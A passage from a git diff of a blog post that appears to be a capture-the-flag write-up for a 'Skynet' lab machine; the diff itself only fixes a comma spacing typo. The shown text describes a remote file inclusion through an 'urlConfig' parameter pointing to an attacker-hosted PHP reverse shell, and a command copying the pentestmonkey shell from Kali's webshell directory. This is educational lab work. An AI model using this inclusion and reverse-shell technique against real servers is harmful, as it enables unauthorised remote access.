Ne4rBy/Ne4rBy.github.io/_posts/2025-01-10-skynetwriteup.md

 We can host a **PHP Reverse Shell** and make the server interpret the file by using the following path `http://<TARGET-IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<LOCAL-IP>/shell.php`.

-So let's start hosting the **PHP Reverse Shell**,if we are using **Kali** or **Parrot**  we can find the classic [Monkey Pentester PHP Reverse Shell](https://pentestmonkey.net/tools/web-shells/php-reverse-shell) at `/usr/share/webshells/laudanum/php/php-reverse-shell.php`, so let's copy it to our current directory.
+So let's start hosting the **PHP Reverse Shell**, if we are using **Kali** or **Parrot**  we can find the classic [Monkey Pentester PHP Reverse Shell](https://pentestmonkey.net/tools/web-shells/php-reverse-shell) at `/usr/share/webshells/laudanum/php/php-reverse-shell.php`, so let's copy it to our current directory.

 ```bash
 cp /usr/share/webshells/laudanum/php/php-reverse-shell.php .